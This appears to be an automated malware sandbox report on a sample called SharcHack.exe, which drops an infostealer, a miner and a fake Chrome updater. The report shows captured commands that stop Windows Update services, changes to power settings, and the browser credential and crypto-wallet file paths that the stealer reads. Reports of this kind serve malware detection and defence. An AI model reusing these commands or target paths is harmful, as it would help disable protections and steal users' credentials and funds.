                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBDA8D4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_6BBDA8D4
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B61BFD7 GetTimeZoneInformation,8_2_6B61BFD7
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B4D0458 SysAllocString,__EH_prolog3_GS,GetCurrentThread,GetCurrentThreadId,GetVersionExW,8_2_6B4D0458
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                  Lowering of HIPS / PFW / Operating System Security Settings

                                  barindex
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc

                                  Stealing of Sensitive Information

                                  barindex
                                  Source: Yara matchFile source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: VegaStealer_v2.exe PID: 3252, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: v2.exe PID: 5316, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED
                                  Source: Yara matchFile source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED
                                  Source: Yara matchFile source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: VegaStealer_v2.exe PID: 3252, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: v2.exe PID: 5316, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED
                                  Source: Yara matchFile source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: VegaStealer_v2.exe PID: 3252, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: v2.exe PID: 5316, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED
                                  Source: Yara matchFile source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000002.2163857464.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: VegaStealer_v2.exe PID: 3252, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: v2.exe PID: 5316, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: JaxxDir
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %\Wallets\DashCore\)\DashCore\wallet.dat#\Electrum\wallets%\Wallets\Electrum\%\Ethereum\keystore%\Wallets\Ethereum\-\Exodus\exodus.wallet\!\Wallets\Exodus\m\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %\Wallets\DashCore\)\DashCore\wallet.dat#\Electrum\wallets%\Wallets\Electrum\%\Ethereum\keystore%\Wallets\Ethereum\-\Exodus\exodus.wallet\!\Wallets\Exodus\m\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusDir
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %\Wallets\DashCore\)\DashCore\wallet.dat#\Electrum\wallets%\Wallets\Electrum\%\Ethereum\keystore%\Wallets\Ethereum\-\Exodus\exodus.wallet\!\Wallets\Exodus\m\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: [Org.BouncyCastle.Pkcs12.IgnoreUselessPasswordtrueqpassword supplied for keystore that does not require one
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                                  Source: Yara matchFile source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: VegaStealer_v2.exe PID: 3252, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: v2.exe PID: 5316, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED

                                  Remote Access Functionality

                                  barindex
                                  Source: Yara matchFile source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: VegaStealer_v2.exe PID: 3252, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: v2.exe PID: 5316, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED
                                  Source: Yara matchFile source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED
                                  Source: Yara matchFile source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: VegaStealer_v2.exe PID: 3252, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: v2.exe PID: 5316, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED
                                  Source: Yara matchFile source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: VegaStealer_v2.exe PID: 3252, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: v2.exe PID: 5316, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED
                                  Source: Yara matchFile source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000002.2163857464.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: VegaStealer_v2.exe PID: 3252, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: v2.exe PID: 5316, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBF9200 GetModuleHandleW,GetModuleHandleW,OutputDebugStringA,OutputDebugStringA,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,OutputDebugStringA,OutputDebugStringA,GetLastError,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,CorBindToRuntimeEx,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,_memset,__snprintf,OutputDebugStringA,7_2_6BBF9200
                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  1
                                  Software
                                  Acquire InfrastructureValid Accounts131
                                  Windows Management Instrumentation
                                  11
                                  DLL Side-Loading
                                  1
                                  Abuse Elevation Control Mechanism
                                  21
                                  Disable or Modify Tools
                                  1
                                  OS Credential Dumping
                                  2
                                  System Time Discovery
                                  Remote Services1
                                  Archive Collected Data
                                  3
                                  Ingress Tool Transfer
                                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomainsDefault Accounts1
                                  Native API
                                  11
                                  Windows Service
                                  11
                                  DLL Side-Loading
                                  1
                                  Deobfuscate/Decode Files or Information
                                  21
                                  Input Capture
                                  3
                                  File and Directory Discovery
                                  Remote Desktop Protocol3
                                  Data from Local System
                                  21
                                  Encrypted Channel
                                  Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts112
                                  Command and Scripting Interpreter
                                  2
                                  Scheduled Task/Job
                                  11
                                  Windows Service
                                  1
                                  Abuse Elevation Control Mechanism
                                  Security Account Manager67
                                  System Information Discovery
                                  SMB/Windows Admin Shares21
                                  Input Capture
                                  4
                                  Non-Application Layer Protocol
                                  Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal Accounts2
                                  Scheduled Task/Job
                                  Login Hook311
                                  Process Injection
                                  3
                                  Obfuscated Files or Information
                                  NTDS1
                                  Query Registry
                                  Distributed Component Object ModelInput Capture15
                                  Application Layer Protocol
                                  Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud Accounts1
                                  Service Execution
                                  Network Logon Script2
                                  Scheduled Task/Job
                                  1
                                  Timestomp
                                  LSA Secrets351
                                  Security Software Discovery
                                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable Media1
                                  PowerShell
                                  RC ScriptsRC Scripts11
                                  DLL Side-Loading
                                  Cached Domain Credentials151
                                  Virtualization/Sandbox Evasion
                                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                  File Deletion
                                  DCSync2
                                  Process Discovery
                                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job13
                                  Masquerading
                                  Proc Filesystem1
                                  Application Window Discovery
                                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                                  Modify Registry
                                  /etc/passwd and /etc/shadow2
                                  System Owner/User Discovery
                                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron151
                                  Virtualization/Sandbox Evasion
                                  Network Sniffing1
                                  System Network Configuration Discovery
                                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd311
                                  Process Injection
                                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581756 Sample: SharcHack.exe Startdate: 28/12/2024 Architecture: WINDOWS Score: 100 75 freegeoip.app 2->75 77 shield.reasonsecurity.com 2->77 79 11 other IPs or domains 2->79 93 Malicious sample detected (through community Yara rule) 2->93 95 Antivirus detection for dropped file 2->95 97 Antivirus / Scanner detection for submitted sample 2->97 101 21 other signatures 2->101 8 SharcHack.exe 4 2->8         started        11 updater.exe 2->11         started        14 cmd.exe 2->14         started        16 10 other processes 2->16 signatures3 99 Tries to detect the country of the analysis system (by using the IP) 75->99 process4 file5 57 C:\Users\user\AppData\...\VegaStealer_v2.exe, PE32 8->57 dropped 59 C:\Users\user\AppData\...\CheatEngine75.exe, PE32 8->59 dropped 61 C:\Users\user\AppData\Local\Temp\3.exe, PE32+ 8->61 dropped 18 VegaStealer_v2.exe 17 8->18         started        22 CheatEngine75.exe 2 8->22         started        24 3.exe 1 8->24         started        63 C:\Windows\Temp\cfoutowi.tmp, PE32+ 11->63 dropped 65 C:\Program Filesbehaviorgraphoogle\Libs\WR64.sys, PE32+ 11->65 dropped 125 Suspicious powershell command line found 11->125 127 Writes to foreign memory regions 11->127 129 Modifies the context of a thread in another process (thread injection) 11->129 143 4 other signatures 11->143 26 conhost.exe 11->26         started        131 Uses cmd line tools excessively to alter registry or file data 14->131 133 Uses powercfg.exe to modify the power settings 14->133 135 Stops critical windows services 14->135 28 conhost.exe 14->28         started        34 10 other processes 14->34 137 Uses schtasks.exe or at.exe to add and modify task schedules 16->137 139 Loading BitLocker PowerShell Module 16->139 141 Modifies power options to not sleep / hibernate 16->141 30 conhost.exe 16->30         started        32 conhost.exe 16->32         started        36 26 other processes 16->36 signatures6 process7 file8 45 C:\Users\user\AppData\Local\Temp\v2.exe, PE32 18->45 dropped 47 C:\Users\user\...\System.Data.SQLite.dll, PE32 18->47 dropped 49 C:\Users\user\...\System.Data.SQLite.Linq.dll, PE32 18->49 dropped 55 6 other malicious files 18->55 dropped 103 Antivirus detection for dropped file 18->103 105 Multi AV Scanner detection for dropped file 18->105 107 Machine Learning detection for dropped file 18->107 115 2 other signatures 18->115 38 v2.exe 15 112 18->38         started        51 C:\Users\user\AppData\...\CheatEngine75.tmp, PE32 22->51 dropped 42 CheatEngine75.tmp 5 30 22->42         started        53 C:\Program Filesbehaviorgraphoogle\Chrome\updater.exe, PE32+ 24->53 dropped 109 Suspicious powershell command line found 24->109 111 Adds a directory exclusion to Windows Defender 24->111 113 Found direct / indirect Syscall (likely to bypass EDR) 24->113 signatures9 process10 dnsIp11 81 ip-api.com 208.95.112.1, 49707, 49709, 49994 TUT-ASUS United States 38->81 83 ipbase.com 104.21.85.189, 443, 49705 CLOUDFLARENETUS United States 38->83 85 freegeoip.app 172.67.160.84, 443, 49704 CLOUDFLARENETUS United States 38->85 117 Multi AV Scanner detection for dropped file 38->117 119 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 38->119 121 Tries to harvest and steal browser information (history, passwords, etc) 38->121 123 Tries to steal Crypto Currency Wallets 38->123 87 d14mh4uvqj4iiz.cloudfront.net 18.66.161.123, 443, 49873, 49920 MIT-GATEWAYSUS United States 42->87 89 d31tu1fsc224h4.cloudfront.net 13.226.4.166, 443, 49710, 49720 AMAZON-02US United States 42->89 91 3 other IPs or domains 42->91 67 C:\Users\user\AppData\...\zbShieldUtils.dll, PE32 42->67 dropped 69 C:\Users\user\AppData\...\prod2.exe (copy), PE32 42->69 dropped 71 C:\Users\user\AppData\Local\...\prod2 (copy), PE32 42->71 dropped 73 5 other files (4 malicious) 42->73 dropped file12 signatures13

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand
                                  SourceDetectionScannerLabelLink
                                  SharcHack.exe78%VirustotalBrowse
                                  SharcHack.exe81%ReversingLabsByteCode-MSIL.Trojan.CrypterX
                                  SharcHack.exe100%AviraDR/Delphi.Gen
                                  SharcHack.exe100%Joe Sandbox ML
                                  SourceDetectionScannerLabelLink
                                  C:\Program Files\Google\Chrome\updater.exe100%AviraHEUR/AGEN.1329655
                                  C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe100%AviraHEUR/AGEN.1339346
                                  C:\Users\user\AppData\Local\Temp\CheatEngine75.exe100%AviraPUA/OfferCore.Gen
                                  C:\Users\user\AppData\Local\Temp\3.exe100%AviraHEUR/AGEN.1329655
                                  C:\Program Files\Google\Chrome\updater.exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\Temp\3.exe100%Joe Sandbox ML
                                  C:\Program Files\Google\Libs\WR64.sys5%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\BouncyCastle.Crypto.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\CheatEngine75.exe43%ReversingLabsWin32.PUA.OfferCore
                                  C:\Users\user\AppData\Local\Temp\EntityFramework.SqlServer.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\EntityFramework.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\SQLite.Interop.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\System.Data.SQLite.EF6.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\System.Data.SQLite.Linq.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\System.Data.SQLite.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe100%ReversingLabsWin32.Hacktool.Vbinder
                                  C:\Users\user\AppData\Local\Temp\is-3E079.tmp\CheatEngine75.exe5%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\is-3E079.tmp\_isetup\_setup64.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0_extract\saBSI.exe0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod1_extract\WZSetup.exe0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\is-3E079.tmp\zbShieldUtils.dll5%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp3%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\v2.exe83%ReversingLabsByteCode-MSIL.Infostealer.Stealgen
                                  C:\Windows\Temp\cfoutowi.tmp62%ReversingLabsWin64.Trojan.Miner
                                  No Antivirus matches
                                  No Antivirus matches
                                  SourceDetectionScannerLabelLink
                                  https://shield.reasonsecurity.com/rsStubActivator.exe.0%Avira URL Cloudsafe
                                  https://d34hwk9wxgk5fi.cloudfront.net:443/zbdWgI0%Avira URL Cloudsafe
                                  https://www.mcafee.com/consumer/en-us/policy/legal.htmles/969/EN.pngzipMSSP0%Avira URL Cloudsafe
                                  http://go.microsof0%Avira URL Cloudsafe
                                  https://www.premieropinion.com/privacy-policyl0%Avira URL Cloudsafe
                                  https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zippM32-xL0%Avira URL Cloudsafe
                                  http://ns.adobe.0/0%Avira URL Cloudsafe
                                  https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/images/969/EN.png0%Avira URL Cloudsafe
                                  https://d34hwk9wxgk5fi.cloudfront.net/f/0%Avira URL Cloudsafe
                                  https://www.mcafee.com/consumer/en-us/policy/legal.htmlReplaced/OperaSetup.zipnet0%Avira URL Cloudsafe
                                  https://d31tu1fsc224h4.cloudfront.net:443//WebAdvisor/images/943/EN.png0%Avira URL Cloudsafe
                                  http://www.microsoft.cxx0%Avira URL Cloudsafe
                                  https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/images/969/EN.pngzip)yH0%Avira URL Cloudsafe
                                  https://d34hwk9wxgk5fi.cloudfront.net:443/zbdk5fi.cloudfront.net:443/zbdv0%Avira URL Cloudsafe
                                  http://crl3.digicert.cPom/D0%Avira URL Cloudsafe
                                  https://shield.reasonsecurity.com/rsStubActivator.exeles/969/WZSetup.zip0%Avira URL Cloudsafe
                                  http://crl3.digicert0%Avira URL Cloudsafe
                                  https://shield.reasonsecurity.com/rsStubActivator.exem0%Avira URL Cloudsafe
                                  https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/files/969/WZSetup.zipjy0%Avira URL Cloudsafe
                                  https://www.mcafee.com/consumer/en-us/policy/legal.html40%Avira URL Cloudsafe
                                  https://d31tu1fsc224h4.cloudfront.net/IN0%Avira URL Cloudsafe
                                  https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zipTEM32-xL0%Avira URL Cloudsafe
                                  https://www.avast.co0%Avira URL Cloudsafe
                                  http://cacerts.di0%Avira URL Cloudsafe
                                  https://d31tu1fsc224h4.cloudfront.net:443/gd0%Avira URL Cloudsafe
                                  https://d34hwk9wxgk5fi.cloudfront.net:443/zbd0%Avira URL Cloudsafe
                                  https://d34hwk9wxgk5fi.cloudfront.net/f/RAV_Triple_NCB/images/DOTPS-855/EN.pnge0%Avira URL Cloudsafe
                                  http://go.microsoft0%Avira URL Cloudsafe
                                  https://d31tu1fsc224h4.cloudfront.net/FbN0%Avira URL Cloudsafe
                                  https://www.premieropinion.com/privacy-policy-0%Avira URL Cloudsafe
                                  https://www.premieropinion.com/privacy-policyG0%Avira URL Cloudsafe
                                  https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zipp.png40%Avira URL Cloudsafe
                                  https://d31tu1fsc224h4.cloudfront.net:443/bdp0%Avira URL Cloudsafe
                                  https://d31tu1fsc224h4.cloudfront.net:443/0%Avira URL Cloudsafe
